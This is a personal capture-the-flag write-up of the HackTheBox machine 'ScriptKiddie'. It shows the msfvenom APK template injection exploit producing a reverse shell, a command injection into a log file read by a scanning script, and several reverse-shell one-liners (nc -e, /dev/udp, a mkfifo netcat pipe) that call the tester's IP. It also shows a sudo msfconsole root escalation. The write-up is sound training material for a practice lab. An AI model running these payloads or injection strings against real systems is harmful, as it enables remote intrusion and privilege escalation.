Hello again and welcome back to another of my HackTheBox technical write ups! This time I am going for a simple box which although simple, still kept me busy as usual. As usual, let's jump right in get started with an nmap scan.

Starting Nmap 7.91 ( https://nmap.org ) at 2021-02-13 22:40 CET
Nmap scan report for 10.10.10.226
Host is up (0.044s latency).
Not shown: 998 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 3c:65:6b:c2:df:b9:9d:62:74:27:a7:b8:a9:d3:25:2c (RSA)
|   256 b9:a1:78:5d:3c:1b:25:e0:3c:ef:67:8d:71:d3:a3:ec (ECDSA)
|_  256 8b:cf:41:82:c6:ac:ef:91:80:37:7c:c9:45:11:e8:43 (ED25519)
5000/tcp open  http    Werkzeug httpd 0.16.1 (Python 3.8.5)
|_http-title: k1d'5 h4ck3r t00l5
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 23.13 seconds


This time the wep portal is on port 5000. Navigating the web (http://10.10.10.226:5000/) to a simple page in text format providing some features that can be used by a hypothetical user.

Using the scan feature, understand that is a simple nmap scan and the sploits searcher seems to query the exploit-db portal.

I have only this page for now, so I try to understand if can be some SQLi vulnerabilities, but, it seems to avoid any attack.

Ok, let try to scan for common subfolder hidden.

┌──(in7rud3r㉿Mykali)-[~/Dropbox/hackthebox/_10.10.10.226 - ScriptKiddie (lin)]
└─$ dirb http://10.10.10.226:5000/

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Sat Feb 13 22:54:50 2021
URL_BASE: http://10.10.10.226:5000/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://10.10.10.226:5000/ ----
                                                                                                                                
-----------------
END_TIME: Sat Feb 13 23:03:50 2021
DOWNLOADED: 4612 - FOUND: 0


Nothing again. Anyway, the second exposed feature seems to use the msfvenom of the Metasploit framework, so I have to check if it can be vulnerable to something, I should go on the exploit-db to check, but I have a nice service on this page, so let's use it.

Great... and it seems to be available in the Metasploit framework.

msf6 > search venom

Matching Modules
================

   #  Name                                                                    Disclosure Date  Rank       Check  Description
   -  ----                                                                    ---------------  ----       -----  -----------
   0  exploit/unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection  2020-10-29       excellent  No     Rapid7 Metasploit Framework msfvenom APK Template Command Injection                                                                                                              


Interact with a module by name or index. For example info 0, use 0 or use exploit/unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection

msf6 > info exploit/unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection

       Name: Rapid7 Metasploit Framework msfvenom APK Template Command Injection
     Module: exploit/unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection
   Platform: Unix
       Arch: cmd
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2020-10-29

Provided by:
  Justin Steven

Available targets:
  Id  Name
  --  ----
  0   Automatic

Check supported:
  No

Basic options:
  Name      Current Setting  Required  Description
  ----      ---------------  --------  -----------
  FILENAME  msf.apk          yes       The APK file name

Payload information:
  Avoid: 5 characters

Description:
  This module exploits a command injection vulnerability in Metasploit 
  Framework's msfvenom payload generator when using a crafted APK file 
  as an Android payload template. Affects Metasploit Framework <= 
  6.0.11 and Metasploit Pro <= 4.18.0. The file produced by this 
  module is a relatively empty yet valid-enough APK file. To trigger 
  the vulnerability, the victim user should do the following: msfvenom 
  -p android/<...> -x <crafted_file.apk>

References:
  https://github.com/justinsteven/advisories/blob/master/2020_metasploit_msfvenom_apk_template_cmdi.md
  https://cvedetails.com/cve/CVE-2020-7384/

msf6 > 


I don't know if it will suit me, but at the moment it is my only way.

msf6 > use exploit/unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection
[*] No payload configured, defaulting to cmd/unix/reverse_netcat                                                                                 
msf6 exploit(unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection) > options                                                           
                                                                                                                                                 
Module options (exploit/unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection):                                                         
                                                                                                                                                 
   Name      Current Setting  Required  Description                                                                                              
   ----      ---------------  --------  -----------                                                                                              
   FILENAME  msf.apk          yes       The APK file name                                                                                        
                                                                                                                                                 
                                                                                                                                                 
Payload options (cmd/unix/reverse_netcat):                                                                                                       
                                                                                                                                                 
   Name   Current Setting  Required  Description                                                                                                 
   ----   ---------------  --------  -----------                                                                                                 
   LHOST  10.0.2.15        yes       The listen address (an interface may be specified)                                                          
   LPORT  4444             yes       The listen port                                                                                             
                                                                                                                                                 
   **DisablePayloadHandler: True   (no handler will be created!)**                                                                               
                                                                                                                                                 
                                                                                                                                                 
Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf6 exploit(unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection) > set lhost 10.10.14.239
lhost => 10.10.14.239
msf6 exploit(unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection) > exploit

[+] msf.apk stored at /home/in7rud3r/.msf4/local/msf.apk


As soon as I upload the file, the portal seems to realize that it is a file that can be processed.

And my listener receives a fantastic reverse shell.

┌──(in7rud3r㉿Mykali)-[~]
└─$ nc -lvp 4444                                                                                                                           127 ⨯
listening on [any] 4444 ...
10.10.10.226: inverse host lookup failed: Unknown host
connect to [10.10.14.239] from (UNKNOWN) [10.10.10.226] 54588
pwd
/home/kid/html
whoami
kid

It's so simple here and the first flag is mine.

ls -la
total 28
drwxrwxr-x  5 kid kid 4096 Feb  3 11:03 .
drwxr-xr-x 11 kid kid 4096 Feb  3 11:49 ..
drwxrwxr-x  2 kid kid 4096 Feb  3 07:40 __pycache__
-rw-rw-r--  1 kid kid 4408 Feb  3 11:03 app.py
drwxrwxr-x  3 kid kid 4096 Feb  3 07:40 static
drwxrwxr-x  2 kid kid 4096 Feb  3 07:40 templates
cd ..
ls -la
total 60
drwxr-xr-x 11 kid  kid  4096 Feb  3 11:49 .
drwxr-xr-x  4 root root 4096 Feb  3 07:40 ..
lrwxrwxrwx  1 root kid     9 Jan  5 20:31 .bash_history -> /dev/null
-rw-r--r--  1 kid  kid   220 Feb 25  2020 .bash_logout
-rw-r--r--  1 kid  kid  3771 Feb 25  2020 .bashrc
drwxrwxr-x  3 kid  kid  4096 Feb  3 07:40 .bundle
drwx------  2 kid  kid  4096 Feb  3 07:40 .cache
drwx------  4 kid  kid  4096 Feb  3 11:49 .gnupg
drwxrwxr-x  3 kid  kid  4096 Feb  3 07:40 .local
drwxr-xr-x  9 kid  kid  4096 Feb  3 07:40 .msf4
-rw-r--r--  1 kid  kid   807 Feb 25  2020 .profile
drwx------  2 kid  kid  4096 Feb 10 16:11 .ssh
-rw-r--r--  1 kid  kid     0 Jan  5 11:10 .sudo_as_admin_successful
drwxrwxr-x  5 kid  kid  4096 Feb  3 11:03 html
drwxrwxrwx  2 kid  kid  4096 Feb 13 22:29 logs
drwxr-xr-x  3 kid  kid  4096 Feb  3 11:48 snap
-r--------  1 kid  kid    33 Feb 13 22:24 user.txt
cat user.txt
3******************************3

Now, try with the simple approach in the beginning, but first of all, I need a tty shell.

sudo -l
sudo: a terminal is required to read the password; either use the -S option to read from standard input or configure an askpass helper
python --version
/bin/sh: 9: python: not found
python3 --version
Python 3.8.5
python3 -c 'import pty; pty.spawn("/bin/sh")'
$

And now, I can try the sudo -l command for example.

$ sudo -l
sudo -l
[sudo] password for kid: 

Sorry, try again.
[sudo] password for kid: 

Sorry, try again.
[sudo] password for kid: 

sudo: 3 incorrect password attempts
$

But I have no access to any command without a password.

After some others try, I chose for my best friend on linux: the linpeas.sh script.

Well, as usual, to upload a file from "my machine", I chose to start a web-server on the folder where the linpeas.sh script is located and download it from the remote machine with a simple wger or curl command. To start the web-server in php, for example the command is "php -S <my ip addess>:<port>".

I suggest saving the linpeas output in a file, in order to transfer it on your machine and analyse it in a confortable way (considering also that the initial part of the output was lost in the shell for the buffer of the output of the command).

Also in this case, to transfer the file from the target machine, this time, I suggest the common way I use usually (apart from some specific restriction on the target machine). The use of the netcat command to transfer file is described on the link below.
Using Netcat for File Transfers

Ok, let's come back to the linpeas output, here an extraction of the interesting points.

[...]
====================================( Interesting Files )=====================================
[+] SUID - Check easy privesc, exploits and write perms                                                                                          
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-and-suid                                                                    
-rwsr-sr-x 1 daemon daemon           55K Nov 12  2018 /usr/bin/at  --->  RTru64_UNIX_4.0g(CVE-2002-1614)                                         
[...]
-rwsr-xr-x 1 root   root             31K Aug 16  2019 /usr/bin/pkexec  --->  Linux4.10_to_5.1.17(CVE-2019-13272)/rhel_6(CVE-2011-1485)
[...]
-rwsr-xr-x 1 root   root             84K May 28  2020 /usr/bin/chfn  --->  SuSE_9.3/10
[...]
-rwxr-sr-x 1 root   incron  103K Mar 22  2020 /usr/bin/incrontab
  --- It looks like /usr/bin/incrontab is executing incrontab and you can impersonate it (strings line: incrontab [<options>] <FILE-TO-IMPORT>)
  --- It looks like /usr/bin/incrontab is executing /dev/null and you can impersonate it (strings line: /dev/null)
  --- It looks like /usr/bin/incrontab is executing /dev/stdin and you can impersonate it (strings line: /dev/stdin)
  --- It looks like /usr/bin/incrontab is executing /etc/incron.d and you can impersonate it (strings line: /etc/incron.d)
  --- It looks like /usr/bin/incrontab is executing /var/run and you can impersonate it (strings line: /var/run)
  --- It looks like /usr/bin/incrontab is executing /var/spool/incron and you can impersonate it (strings line: /var/spool/incron)
  --- It looks like /usr/bin/incrontab is executing chmod and you can impersonate it (strings line: chmod)
  --- It looks like /usr/bin/incrontab is executing chown and you can impersonate it (strings line: chown)
  --- It looks like /usr/bin/incrontab is executing edit and you can impersonate it (strings line: edit)
  --- It looks like /usr/bin/incrontab is executing editor and you can impersonate it (strings line: editor finished with error)
  --- It looks like /usr/bin/incrontab is executing incrond and you can impersonate it (strings line: incrond)
  --- It looks like /usr/bin/incrontab is executing incrontab and you can impersonate it (strings line: incrontab - inotify cron table manipulator)
  --- It looks like /usr/bin/incrontab is executing incrontab and you can impersonate it (strings line: incrontab 0.5.12)
  --- It looks like /usr/bin/incrontab is executing unlink and you can impersonate it (strings line: unlink)
  --- It looks like /usr/bin/incrontab is executing watch and you can impersonate it (strings line: watch collision detected and recovery failed)
  --- Trying to execute /usr/bin/incrontab with strace in order to look for hijackable libraries...
access("/etc/suid-debug", F_OK)         = -1 ENOENT (No such file or directory)
access("/etc/suid-debug", F_OK)         = -1 ENOENT (No such file or directory)
access("/etc/ld.so.preload", R_OK)      = -1 ENOENT (No such file or directory)
openat(AT_FDCWD, "/etc/ld.so.cache", O_RDONLY|O_CLOEXEC) = 3
openat(AT_FDCWD, "/lib/x86_64-linux-gnu/libstdc++.so.6", O_RDONLY|O_CLOEXEC) = 3
openat(AT_FDCWD, "/lib/x86_64-linux-gnu/libgcc_s.so.1", O_RDONLY|O_CLOEXEC) = 3
openat(AT_FDCWD, "/lib/x86_64-linux-gnu/libc.so.6", O_RDONLY|O_CLOEXEC) = 3
openat(AT_FDCWD, "/lib/x86_64-linux-gnu/libm.so.6", O_RDONLY|O_CLOEXEC) = 3
[...]
[+] Backup files
-rw-r--r-- 1 root root 2743 Jul 31  2020 /etc/apt/sources.list.curtin.old                                                                        
-rw-r--r-- 1 root root 1403 Jan 28 12:37 /usr/lib/python3/dist-packages/sos/report/plugins/__pycache__/ovirt_engine_backup.cpython-38.pyc
-rw-r--r-- 1 root root 1775 Aug 17 21:41 /usr/lib/python3/dist-packages/sos/report/plugins/ovirt_engine_backup.py
-rw-r--r-- 1 root root 8169 Jan 18 16:31 /usr/lib/modules/5.4.0-65-generic/kernel/drivers/net/team/team_mode_activebackup.ko
-rw-r--r-- 1 root root 8737 Jan 18 16:31 /usr/lib/modules/5.4.0-65-generic/kernel/drivers/power/supply/wm831x_backup.ko
-rw-r--r-- 1 root root 44048 Jun 22  2020 /usr/lib/open-vm-tools/plugins/vmsvc/libvmbackup.so
-rwxr-xr-x 1 root root 1086 Nov 25  2019 /usr/src/linux-headers-5.4.0-65/tools/testing/selftests/net/tcp_fastopen_backup_key.sh
-rw-r--r-- 1 root root 237775 Jan 18 16:31 /usr/src/linux-headers-5.4.0-65-generic/.config.old
-rw-r--r-- 1 root root 0 Jan 18 16:31 /usr/src/linux-headers-5.4.0-65-generic/include/config/wm831x/backup.h
-rw-r--r-- 1 root root 0 Jan 18 16:31 /usr/src/linux-headers-5.4.0-65-generic/include/config/net/team/mode/activebackup.h
-rw-r--r-- 1 root root 11886 Jan 28 12:38 /usr/share/info/dir.old
-rw-r--r-- 1 root root 2756 Feb 13  2020 /usr/share/man/man8/vgcfgbackup.8.gz
-rw-r--r-- 1 root root 7867 Jul 16  1996 /usr/share/doc/telnet/README.old.gz
-rw-r--r-- 1 root root 392817 Feb  9  2020 /usr/share/doc/manpages/Changes.old.gz
-rw-r--r-- 1 root root 7251 Mar 23  2020 /usr/share/nmap/scripts/http-config-backup.nse
-rw-r--r-- 1 root root 5484 Mar 23  2020 /usr/share/nmap/scripts/http-backup-finder.nse
-rwxr-xr-x 1 root root 226 Feb 17  2020 /usr/share/byobu/desktop/byobu.desktop.old
-rw-r--r-- 1 root root 338 Oct 14 17:55 /usr/share/ri/2.7.0/system/Bundler/EnvironmentPreserver/backup-i.ri
-rw-r--r-- 1 root root 338 Jan  5 11:25 /var/lib/gems/2.7.0/doc/bundler-2.2.4/ri/Bundler/EnvironmentPreserver/backup-i.ri
-rw-r--r-- 1 root root 413 Jan  5 11:25 /var/lib/gems/2.7.0/doc/bundler-2.2.4/ri/Bundler/EnvironmentPreserver/replace_with_backup-i.ri
-rwxr-xr-x 1 root root 640 Jan  5 11:27 /var/lib/gems/2.7.0/gems/nessus_rest-0.1.6/examples/backup-reports.rb
-rw-r--r-- 1 root root 1054 Jan  5 11:27 /var/lib/gems/2.7.0/gems/sqlite3-1.3.13/test/test_backup.rb
-rw-r--r-- 1 root root 320 Jan  5 11:27 /var/lib/gems/2.7.0/gems/sqlite3-1.3.13/ext/sqlite3/backup.h
-rw-r--r-- 1 root root 4474 Jan  5 11:27 /var/lib/gems/2.7.0/gems/sqlite3-1.3.13/ext/sqlite3/backup.c
-rw-r--r-- 1 root root 37128 Jan  5 11:27 /var/lib/gems/2.7.0/gems/sqlite3-1.3.13/ext/sqlite3/backup.o
-rw-r--r-- 1 root root 3196 Jan  5 11:27 /var/lib/gems/2.7.0/gems/nexpose-7.2.1/lib/nexpose/scheduled_backup.rb
-rw-rw-r-- 1 root root 4029 Oct  1 16:52 /opt/metasploit-framework-6.0.9/lib/rex/parser/apple_backup_manifestdb.rb
-rw-rw-r-- 1 root root 1359 Oct  1 16:52 /opt/metasploit-framework-6.0.9/documentation/modules/auxiliary/scanner/http/backup_file.md
-rw-rw-r-- 1 root root 2313 Oct  1 16:52 /opt/metasploit-framework-6.0.9/documentation/modules/exploit/windows/misc/ahsay_backup_fileupload.md
-rw-rw-r-- 1 root root 4229 Oct  1 16:52 /opt/metasploit-framework-6.0.9/documentation/modules/exploit/multi/http/wp_db_backup_rce.md
-rw-rw-r-- 1 root root 13409 Oct  1 16:52 /opt/metasploit-framework-6.0.9/documentation/modules/post/multi/gather/ubiquiti_unifi_backup.md
-rw-rw-r-- 1 root root 2527 Oct  1 16:52 /opt/metasploit-framework-6.0.9/modules/auxiliary/scanner/http/wp_simple_backup_file_read.rb
-rw-rw-r-- 1 root root 2290 Oct  1 16:52 /opt/metasploit-framework-6.0.9/modules/auxiliary/scanner/http/backup_file.rb
-rw-rw-r-- 1 root root 13267 Oct  1 16:52 /opt/metasploit-framework-6.0.9/modules/exploits/windows/misc/ahsay_backup_fileupload.rb
-rw-rw-r-- 1 root root 4087 Oct  1 16:52 /opt/metasploit-framework-6.0.9/modules/exploits/windows/browser/symantec_backupexec_pvcalendar.rb
-rw-rw-r-- 1 root root 4600 Oct  1 16:52 /opt/metasploit-framework-6.0.9/modules/exploits/windows/browser/samsung_neti_wiewer_backuptoavi_bof.rb
-rw-rw-r-- 1 root root 2067 Oct  1 16:52 /opt/metasploit-framework-6.0.9/modules/exploits/multi/misc/veritas_netbackup_cmdexec.rb
-rw-rw-r-- 1 root root 6652 Oct  1 16:52 /opt/metasploit-framework-6.0.9/modules/exploits/multi/http/wp_db_backup_rce.rb
-rw-rw-r-- 1 root root 7214 Oct  1 16:52 /opt/metasploit-framework-6.0.9/modules/post/multi/gather/ubiquiti_unifi_backup.rb
-rw-rw-r-- 1 root root 7694 Oct  1 16:52 /opt/metasploit-framework-6.0.9/modules/post/multi/gather/apple_ios_backup.rb
[...]
[+] Finding possible password in config files
 /etc/debconf.conf                                                                                                                                               
passwords.
password
passwords.
passwords
password
passwords.dat
passwords and one for everything else.
passwords
password is really
Passwd: secret
 /etc/nsswitch.conf
passwd:         files systemd
 /etc/sysctl.d/10-ptrace.conf
credentials that exist in memory (re-using existing SSH connections,
 /etc/adduser.conf
passwd
 /etc/overlayroot.conf
password is randomly generated
password will be stored for recovery in
passwd
password,mkfs=0
PASSWORD="foobar"
PASSWORD" |
PASSWORD" |
PASSWORD HERE IN THIS CLEARTEXT CONFIGURATION
passwords are more secure, but you won't be able to
passwords are generated by calculating the sha512sum
[...]

I lost a lot of hours to check all this points, I found some password inside the files, and something else for linu command that can be used to excalate privileges, like at command and pkexec, but nothin that can be used.

GTFOBins
at | GTFOBins
pkexec | GTFOBins

Also the passwords I found seems to be doesn't work. So, come back on the reverse shell on the target machine. Obviously, I have no access to the root folder, but after a lot of others minutes, I found another user in the home folder.

$ ls -la /root
ls -la /root
ls: cannot open directory '/root': Permission denied
$ ls -la /home
ls -la /home
total 16
drwxr-xr-x  4 root root 4096 Feb  3 07:40 .
drwxr-xr-x 20 root root 4096 Feb  3 07:40 ..
drwxr-xr-x 11 kid  kid  4096 Feb 14 11:06 kid
drwxr-xr-x  7 pwn  pwn  4096 Feb 14 10:21 pwn

The only interesting thing on the folder of this new user is a script with the code, that seems to be the script that executes the nmap scan for the portal (I suppose).

$ cd /home/pwn
cd /home/pwn
$ ls -la
ls -la
total 52
drwxr-xr-x 7 pwn  pwn  4096 Feb 14 10:21 .
drwxr-xr-x 4 root root 4096 Feb  3 07:40 ..
lrwxrwxrwx 1 root root    9 Feb  3 12:06 .bash_history -> /dev/null
-rw-r--r-- 1 pwn  pwn   220 Feb 25  2020 .bash_logout
-rw-r--r-- 1 pwn  pwn  3771 Feb 25  2020 .bashrc
drwx------ 2 pwn  pwn  4096 Jan 28 17:08 .cache
drwxrwxr-x 3 pwn  pwn  4096 Jan 28 17:24 .local
drwxr-xr-x 9 pwn  pwn  4096 Feb 14 10:21 .msf4
-rw-r--r-- 1 pwn  pwn   807 Feb 25  2020 .profile
-rw-rw-r-- 1 pwn  pwn    74 Jan 28 16:22 .selected_editor
drwx------ 2 pwn  pwn  4096 Feb 14 11:04 .ssh
-rw-r--r-- 1 pwn  pwn     4 Feb 14 09:02 out.txt
drwxrw---- 2 pwn  pwn  4096 Feb 14 11:20 recon
-rwxrwxr-- 1 pwn  pwn   250 Jan 28 17:57 scanlosers.sh
$ ls -la recon
ls -la recon
ls: cannot open directory 'recon': Permission denied
$ cat scanlosers.sh
cat scanlosers.sh
#!/bin/bash

log=/home/kid/logs/hackers

cd /home/pwn/
cat $log | cut -d' ' -f3- | sort -u | while read ip; do
    sh -c "nmap --top-ports 10 -oN recon/${ip}.nmap ${ip} 2>&1 >/dev/null" &
done

if [[ $(wc -l < $log) -gt 0 ]]; then echo -n > $log; fi

The script seems to elaborate a file in the logs folder of the kid user.

$ ls -la /home/kid/logs/hackers
ls -la /home/kid/logs/hackers
-rw-rw-r-- 1 kid pwn 0 Feb 14 11:06 /home/kid/logs/hackers

But this file is empty. There's an issue also with the script because I cannot launch it.

$ ./scanlosers.sh
./scanlosers.sh
/bin/sh: 23: ./scanlosers.sh: Permission denied

Ok, keep calm and... try to understand the script.

cut -d' ' -f3-
# take the entire row, if no space otherwise from the third occurrence to the end of the line or if less then 3 elements empty string

while read ip; do
# probably it expect an "ip address"

sh -c "nmap --top-ports 10 -oN recon/${ip}.nmap ${ip} 2>&1 >/dev/null" &
# execute a scan and save the result on the recon folder

Well, clear now, it seems to be vulnerable to a sort of command injection. I think a string like this should be good.

1 2 ;echo 'my test' >> finalfile.txt #

The first two number, need to avoid to be considered from the script (these are discarded) the ";" need to end the previous command and start another one, the "#" char need to comment al the rest of the original command. The rest of the string is the real command that creates a file named "finalfile.txt". This is a test exploit that I try on my machine to be sure it works before to attack the target machine. So, I create a similar script on my machine, modified in the part that I need in order to launch it locally. And, finally, it works. I understand also that after the execution of the script, the file is emptied.

Well, there's a problem now; as I said previously, I cannot launch the script and, anyway, if I could, the script would be executed as the kid user. So, also in this case, I lost a lot of time to understand if there's a process, or a service, or a timer, or something else that launch regularly this script, but I cannot found anything. So, really sad about an exploit that cannot be exploited, I try to insert in the meantime, something in the "hackers" file. When I look at the file, I see that the file is empty again.

$ echo "test" >> hackers
echo "test" >> hackers
$ ls -la
ls -la
total 8
drwxrwxrwx  2 kid kid 4096 Feb  3 07:40 .
drwxr-xr-x 11 kid kid 4096 Feb 14 17:33 ..
-rw-rw-r--  1 kid pwn    0 Feb 14 17:54 hackers


So, I try to execute a "list" command immediately after to understand if I can write on the file. So the result is that the file is emptied ina short; It seems that the script is executed regularly, or there's a sort of monitor on the file that activates something when the file change.

$ echo "test" >> hackers && ls -la
echo "test" >> hackers && ls -la
total 12
drwxrwxrwx  2 kid kid 4096 Feb  3 07:40 .
drwxr-xr-x 11 kid kid 4096 Feb 14 17:33 ..
-rw-rw-r--  1 kid pwn    5 Feb 14 17:53 hackers
$ ls -la
ls -la
total 8
drwxrwxrwx  2 kid kid 4096 Feb  3 07:40 .
drwxr-xr-x 11 kid kid 4096 Feb 14 17:33 ..
-rw-rw-r--  1 kid pwn    0 Feb 14 17:53 hackers


At this point (despite I don't understand where the task that launches the script), I search for the right string that allows me to be logged as the user pwn. It should be something like this:

1 2 ;nc 10.10.14.239 4445 -e /bin/bash #


So the final attack is:

$ echo "1 2 ;nc 10.10.14.239 4445 -e /bin/bash #" >> hackers
echo "1 2 ;nc 10.10.14.239 4445 -e /bin/bash #" >> hackers


But nothing happens, so probably I have some problem with the version of netcat command. I try something different, but again nothing happens.

$ echo "1 2 ;sh -i >& /dev/udp/10.10.14.239/4445 0>&1 #" >> hackers
echo "1 2 ;sh -i >& /dev/udp/10.10.14.239/4445 0>&1 #" >> hackers


So, I go ahead to one of the reverse shell that works always:

$ echo "1 2 ;rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.239 4445 >/tmp/f #" >> hackers
echo "1 2 ;rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.239 4445 >/tmp/f #" >> hackers


And infact:

┌──(in7rud3r㉿Mykali)-[~/…/hackthebox/_10.10.10.226 - ScriptKiddie (lin)/attack/downloaded]
└─$ nc -lvp 4445                                                                                                                                             1 ⨯
listening on [any] 4445 ...
10.10.10.226: inverse host lookup failed: Unknown host
connect to [10.10.14.239] from (UNKNOWN) [10.10.10.226] 52920
/bin/sh: 0: can't access tty; job control turned off
$ whoami
pwn

Well, but I'm not at the finish line, the pwn user, anyway, can't reach the root folder.

$ ls -la /root/
ls: cannot open directory '/root/': Permission denied
$ cat /root/root.txt
cat: /root/root.txt: Permission denied

Well, let's try something simple.

$ sudo -l
Matching Defaults entries for pwn on scriptkiddie:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User pwn may run the following commands on scriptkiddie:
    (root) NOPASSWD: /opt/metasploit-framework-6.0.9/msfconsole

What? Really?!?!? I can execute the Metasploit framework as root? Well, let me go ahead without check anything!

$ sudo msfconsole
                                                  
       =[ metasploit v6.0.9-dev                           ]
+ -- --=[ 2069 exploits - 1122 auxiliary - 352 post       ]
+ -- --=[ 592 payloads - 45 encoders - 10 nops            ]
+ -- --=[ 7 evasion                                       ]

Metasploit tip: Open an interactive Ruby terminal with irb

stty: 'standard input': Inappropriate ioctl for device
stty: 'standard input': Inappropriate ioctl for device
stty: 'standard input': Inappropriate ioctl for device
stty: 'standard input': Inappropriate ioctl for device
stty: 'standard input': Inappropriate ioctl for device
stty: 'standard input': Inappropriate ioctl for device
stty: 'standard input': Inappropriate ioctl for device
msf6 > cat /root/root.txt
stty: 'standard input': Inappropriate ioctl for device
[*] exec: cat /root/root.txt

2******************************9

And that's it, the root flag. That's all folks, really glad to entertain you during this reading! Have a nice day... and enjoy your hacking activities! :)

The awesome images used in this weeks edition were created by Felix Hernandez.